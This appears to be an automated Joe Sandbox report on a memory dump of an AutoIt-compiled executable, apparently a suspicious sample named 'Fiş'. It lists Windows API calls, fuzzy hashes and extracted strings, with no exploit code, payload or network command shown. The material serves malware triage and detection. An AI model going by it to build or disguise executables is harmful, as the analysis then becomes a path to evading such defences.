                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00E979DC
                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00E979E7
                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00E979F2
                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00E979FD
                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00E97A08
                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00E97A13
                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00E97A1E
                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00E97A29
                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00E97A34
                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00E97A3F
                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00E97A4A
                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00E97A55
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00E97A60
                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00E97A6B
                                                        • GetCursorInfo.USER32(?), ref: 00E97A7B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Cursor$Load$Info
                                                        • String ID:
                                                        • API String ID: 2577412497-0
                                                        • Opcode ID: ae92f5ba4b78b84407b8121a07d054eebbd19f8a13e0d94e7781d3ce7973e2be
                                                        • Instruction ID: f5f69368712e6836c2589d7b8b5e291572c6fc1b9a007a80627f38e1aa2a431d
                                                        • Opcode Fuzzy Hash: ae92f5ba4b78b84407b8121a07d054eebbd19f8a13e0d94e7781d3ce7973e2be
                                                        • Instruction Fuzzy Hash: E83105B0D083196ADF109FB68C8995FBEE8FB04754F50452AA54DF7180DA78A5048F91
                                                        APIs
                                                          • Part of subcall function 00E5E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E4C8B7,?,00002000,?,?,00000000,?,00E4419E,?,?,?,00EDDC00), ref: 00E5E984
                                                          • Part of subcall function 00E4660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E453B1,?,?,00E461FF,?,00000000,00000001,00000000), ref: 00E4662F
                                                        • __wsplitpath.LIBCMT ref: 00E4C93E
                                                          • Part of subcall function 00E61DFC: __wsplitpath_helper.LIBCMT ref: 00E61E3C
                                                        • _wcscpy.LIBCMT ref: 00E4C953
                                                        • _wcscat.LIBCMT ref: 00E4C968
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00E4C978
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E4CABE
                                                          • Part of subcall function 00E4B337: _wcscpy.LIBCMT ref: 00E4B36F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                        • API String ID: 2258743419-1018226102
                                                        • Opcode ID: 99a913d726ec3b717ed692a2eff5f797750ccb449e28372279be82f472ce808c
                                                        • Instruction ID: e31bc7257266c2d05fb5759875ea5f3ac0604315256a0f2910387fef0c139bde
                                                        • Opcode Fuzzy Hash: 99a913d726ec3b717ed692a2eff5f797750ccb449e28372279be82f472ce808c
                                                        • Instruction Fuzzy Hash: 7D129F715083419FC724EF24D882AAFBBE5BF88304F14691EF599B3261DB30DA49CB52
                                                        APIs
                                                        • _memset.LIBCMT ref: 00EACEFB
                                                        • DestroyWindow.USER32(?,?), ref: 00EACF73
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EACFF4
                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EAD016
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EAD025
                                                        • DestroyWindow.USER32(?), ref: 00EAD042
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E40000,00000000), ref: 00EAD075
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EAD094
                                                        • GetDesktopWindow.USER32 ref: 00EAD0A9
                                                        • GetWindowRect.USER32(00000000), ref: 00EAD0B0
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EAD0C2
                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EAD0DA
                                                          • Part of subcall function 00E5B526: GetWindowLongW.USER32(?,000000EB), ref: 00E5B537
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                        • String ID: 0$tooltips_class32
                                                        • API String ID: 3877571568-3619404913
                                                        • Opcode ID: 1dd2e25d38410fb60577381f9f2c2c59521d1ea7d834d885569dc0e50dc53ff5
                                                        • Instruction ID: 2d2608057ada7b9d5d41f211232ed1333f00e3de6be5d57f295605d1c21ecfa5
                                                        • Opcode Fuzzy Hash: 1dd2e25d38410fb60577381f9f2c2c59521d1ea7d834d885569dc0e50dc53ff5
                                                        • Instruction Fuzzy Hash: CC71D170148305AFD720CF28CC84F6677EAFB89708F04551DF986AB2A1DB35E946DB12
                                                        APIs
                                                          • Part of subcall function 00E5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E5B35F
                                                        • DragQueryPoint.SHELL32(?,?), ref: 00EAF37A
                                                          • Part of subcall function 00EAD7DE: ClientToScreen.USER32(?,?), ref: 00EAD807
                                                          • Part of subcall function 00EAD7DE: GetWindowRect.USER32(?,?), ref: 00EAD87D
                                                          • Part of subcall function 00EAD7DE: PtInRect.USER32(?,?,00EAED5A), ref: 00EAD88D
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00EAF3E3
                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EAF3EE
                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EAF411
                                                        • _wcscat.LIBCMT ref: 00EAF441
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EAF458
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00EAF471
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00EAF488
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00EAF4AA
                                                        • DragFinish.SHELL32(?), ref: 00EAF4B1
                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00EAF59C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                        • API String ID: 169749273-3440237614
                                                        • Opcode ID: f839857a71e5a57eb82874d2816dae9bbc0002b9d1bbb04fee26a7f840f347de
                                                        • Instruction ID: 3b005b3f456bc92b2ab6f7ce0df6b60b6d3092af6f8a8de2d308ede9f42a49fd
                                                        • Opcode Fuzzy Hash: f839857a71e5a57eb82874d2816dae9bbc0002b9d1bbb04fee26a7f840f347de
                                                        • Instruction Fuzzy Hash: B7613A71108304AFC315DF64DC85DABBBE8FF89710F001A2EF695A61A1DB71AA09CB52
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00EB3973,00000016,0000138C,00000016,?,00000016,00EDDDB4,00000000,?), ref: 00E826F1
                                                        • LoadStringW.USER32(00000000,?,00EB3973,00000016), ref: 00E826FA
                                                        • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00EB3973,00000016,0000138C,00000016,?,00000016,00EDDDB4,00000000,?,00000016), ref: 00E8271C
                                                        • LoadStringW.USER32(00000000,?,00EB3973,00000016), ref: 00E8271F
                                                        • __swprintf.LIBCMT ref: 00E8276F
                                                        • __swprintf.LIBCMT ref: 00E82780
                                                        • _wprintf.LIBCMT ref: 00E82829
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E82840
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR$s9
                                                        • API String ID: 618562835-2846937808
                                                        • Opcode ID: 6b9ef20b3ec2f216e8640bc5db6dd0cbd85d3cc0d28b2d90e19750a5e41e1e23
                                                        • Instruction ID: 84aba2959b77020581f72abc658949494d6ff0c558a19db93c1ddc16a2568ff2
                                                        • Opcode Fuzzy Hash: 6b9ef20b3ec2f216e8640bc5db6dd0cbd85d3cc0d28b2d90e19750a5e41e1e23
                                                        • Instruction Fuzzy Hash: CB412F72801219BBCF15FBE0ED86EEEB7B8AF15340F101069B60577092EA716F59CB61
                                                        APIs
                                                        • VariantInit.OLEAUT32(00000000), ref: 00E8AB3D
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00E8AB46
                                                        • VariantClear.OLEAUT32(?), ref: 00E8AB52
                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00E8AC40
                                                        • __swprintf.LIBCMT ref: 00E8AC70
                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00E8AC9C
                                                        • VariantInit.OLEAUT32(?), ref: 00E8AD4D
                                                        • SysFreeString.OLEAUT32(00000016), ref: 00E8ADDF
                                                        • VariantClear.OLEAUT32(?), ref: 00E8AE35
                                                        • VariantClear.OLEAUT32(?), ref: 00E8AE44
                                                        • VariantInit.OLEAUT32(00000000), ref: 00E8AE80
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                        • API String ID: 3730832054-3931177956
                                                        • Opcode ID: 0c449c7a420bdc22d63e9798e6f68eab1286d061981fa60d9d506ecb9764f011
                                                        • Instruction ID: c4ba84871603669f420d96a0db792cfb509b3d20fa9c9639a3199f87391e3612
                                                        • Opcode Fuzzy Hash: 0c449c7a420bdc22d63e9798e6f68eab1286d061981fa60d9d506ecb9764f011
                                                        • Instruction Fuzzy Hash: 9FD1D071A04605DBEB20AF65D884BA9B7F5FF04700F18A476E91DBB181DB70EC44DBA2
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00EA71FC
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EA7247
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                        • API String ID: 3974292440-4258414348
                                                        • Opcode ID: 7c4e74d659a68d4aeeec5340b8ddba98de4dd10d58fcaa8ac2fcd1fe179a8dd2
                                                        • Instruction ID: fdb82be344b39a5a72208e1d684277a895c245e940028bf915924e9a5d3c0e89
                                                        • Opcode Fuzzy Hash: 7c4e74d659a68d4aeeec5340b8ddba98de4dd10d58fcaa8ac2fcd1fe179a8dd2
                                                        • Instruction Fuzzy Hash: 38915E702086419BCB14EF10C851A6EB7E5AF99314F10A85DF9967B3A3DB31FD0ACB91
                                                        APIs
                                                        • EnumChildWindows.USER32(?,00E7CF50), ref: 00E7CE90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ChildEnumWindows
                                                        • String ID: 4+$CLASS$CLASSNN$H+$INSTANCE$L+$NAME$P+$REGEXPCLASS$T+$TEXT
                                                        • API String ID: 3555792229-2655548891
                                                        • Opcode ID: 6cb9f426748c8a492238f03925a134b7bf3632f47502c90f6943e96356018b29
                                                        • Instruction ID: 2c6dfa84373cb2a26001047815cda7312a5713773edc3b1f0d8384421b261bc5
                                                        • Opcode Fuzzy Hash: 6cb9f426748c8a492238f03925a134b7bf3632f47502c90f6943e96356018b29
                                                        • Instruction Fuzzy Hash: AE9192306005069ACB18DF60D482BEAFBB9FF44304F64E55DE94DB7251DF30A99ADB90
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00EAE5AB
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00EABEAF), ref: 00EAE607
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EAE647
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EAE68C
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00EAE6C3
                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00EABEAF), ref: 00EAE6CF
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EAE6DF
                                                        • DestroyIcon.USER32(?,?,?,?,?,00EABEAF), ref: 00EAE6EE
                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00EAE70B
                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00EAE717
                                                          • Part of subcall function 00E60FA7: __wcsicmp_l.LIBCMT ref: 00E61030
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                        • String ID: .dll$.exe$.icl
                                                        • API String ID: 1212759294-1154884017
                                                        • Opcode ID: f0a02d649221705d93f657c4b16759a5d34f708879db68a96e8bb28c28116bf2
                                                        • Instruction ID: 2982a767c87c67c945a8bf28f1c039589f644046288289e1ba613954149fcdc0
                                                        • Opcode Fuzzy Hash: f0a02d649221705d93f657c4b16759a5d34f708879db68a96e8bb28c28116bf2
                                                        • Instruction Fuzzy Hash: 9761DE71940219FEEB24DF64DC42FBE7BA8BB09724F105515F911FA2D1EB71A980CBA0
                                                        APIs
                                                          • Part of subcall function 00E4936C: __swprintf.LIBCMT ref: 00E493AB
                                                          • Part of subcall function 00E4936C: __itow.LIBCMT ref: 00E493DF
                                                        • CharLowerBuffW.USER32(?,?), ref: 00E8D292
                                                        • GetDriveTypeW.KERNEL32 ref: 00E8D2DF
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E8D327
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E8D35E
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E8D38C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                        • API String ID: 1148790751-4113822522
                                                        • Opcode ID: 043fced69f25a7047eebfe594afe878c3357689b999e72b6a0f00867faf5360b
                                                        • Instruction ID: ade413de3f384f3b113ef0e7c69f61eb32eeb49f2a9ddae8eb7ae2f61b047e6d
                                                        • Opcode Fuzzy Hash: 043fced69f25a7047eebfe594afe878c3357689b999e72b6a0f00867faf5360b
                                                        • Instruction Fuzzy Hash: A2514C715047059FC700EF21D88196EB7E4EF98718F10686DF89A772A1DB31EE0ACB42
                                                        APIs
                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E8D0D8
                                                        • __swprintf.LIBCMT ref: 00E8D0FA
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E8D137
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E8D15C
                                                        • _memset.LIBCMT ref: 00E8D17B
                                                        • _wcsncpy.LIBCMT ref: 00E8D1B7
                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E8D1EC
                                                        • CloseHandle.KERNEL32(00000000), ref: 00E8D1F7
                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00E8D200
                                                        • CloseHandle.KERNEL32(00000000), ref: 00E8D20A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                        • String ID: :$\$\??\%s
                                                        • API String ID: 2733774712-3457252023
                                                        • Opcode ID: e847fedca533180e1c4537fccfbc44d0e6f41d38fa8ccd5d6ab1be70733b0004
                                                        • Instruction ID: 5e005c1ac9b7cb24b36385727bcd74a740c9c456a12fe6625d47a252a3c726c6
                                                        • Opcode Fuzzy Hash: e847fedca533180e1c4537fccfbc44d0e6f41d38fa8ccd5d6ab1be70733b0004
                                                        • Instruction Fuzzy Hash: 8031C1B2544109ABDB21EFA5DC48FEB77BCEF88744F1050BAF50DE21A0E771A6458B24
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00EABEF4,?,?), ref: 00EAE754
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00EABEF4,?,?,00000000,?), ref: 00EAE76B
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00EABEF4,?,?,00000000,?), ref: 00EAE776
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00EABEF4,?,?,00000000,?), ref: 00EAE783
                                                        • GlobalLock.KERNEL32(00000000), ref: 00EAE78C
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00EABEF4,?,?,00000000,?), ref: 00EAE79B
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EAE7A4
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00EABEF4,?,?,00000000,?), ref: 00EAE7AB
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00EABEF4,?,?,00000000,?), ref: 00EAE7BC
                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00ECD9BC,?), ref: 00EAE7D5
                                                        • GlobalFree.KERNEL32(00000000), ref: 00EAE7E5
                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00EAE809
                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00EAE834
                                                        • DeleteObject.GDI32(00000000), ref: 00EAE85C
                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00EAE872
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                        • String ID:
                                                        • API String ID: 3840717409-0
                                                        • Opcode ID: 3786845e686096de4442244131f4a6e3c273354a0f34927dfe06e6bf271c7344
                                                        • Instruction ID: ffa777a518b2aaa4c80c44adfeba2c979e9dbf21f47f818c3676dab99dc26fbc
                                                        • Opcode Fuzzy Hash: 3786845e686096de4442244131f4a6e3c273354a0f34927dfe06e6bf271c7344
                                                        • Instruction Fuzzy Hash: C2414C75500204FFDB159F66DC48EAABBB9FF89715F104068F905EB260C732AD46CB60
                                                        APIs
                                                        • __wsplitpath.LIBCMT ref: 00E9076F
                                                        • _wcscat.LIBCMT ref: 00E90787
                                                        • _wcscat.LIBCMT ref: 00E90799
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E907AE
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E907C2
                                                        • GetFileAttributesW.KERNEL32(?), ref: 00E907DA
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00E907F4
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E90806
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
